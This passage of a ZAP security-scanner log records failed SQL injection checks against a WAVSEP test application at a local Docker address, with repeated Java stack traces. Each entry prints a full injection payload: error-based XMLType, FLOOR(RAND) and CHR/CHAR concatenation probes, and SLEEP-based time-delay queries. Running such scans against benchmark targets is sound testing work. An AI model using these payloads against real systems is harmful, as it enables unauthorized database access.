(5490=5490) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922404 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 1549=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1549=1549) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('VgCp'='VgCp] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 1549=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1549=1549) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('VgCp'='VgCp at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922405 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 4856=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4856=4856) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'DzXK'='DzXK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 4856=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4856=4856) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'DzXK'='DzXK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922407 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 5713=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5713=5713) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 5713=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5713=5713) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922409 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 9539=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9539=9539) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- NHqw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 9539=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9539=9539) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- NHqw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922410 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 2206 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2206=2206,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/(SELECT 2206 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2206=2206,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922417 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(6077=6077,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(6077=6077,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922418 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9231=9231) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9231=9231) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922419 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2281=2281) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2281=2281) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922421 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp);(SELECT * FROM (SELECT(SLEEP(5)))snfW)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp);(SELECT * FROM (SELECT(SLEEP(5)))snfW)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922423 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;(SELECT * FROM (SELECT(SLEEP(5)))feIi)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;(SELECT * FROM (SELECT(SLEEP(5)))feIi)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922433 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp');(SELECT * FROM (SELECT(SLEEP(5)))UAqJ)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp');(SELECT * FROM (SELECT(SLEEP(5)))UAqJ)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922435 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp';(SELECT * FROM (SELECT(SLEEP(5)))nQHH)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp';(SELECT * FROM (SELECT(SLEEP(5)))nQHH)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922436 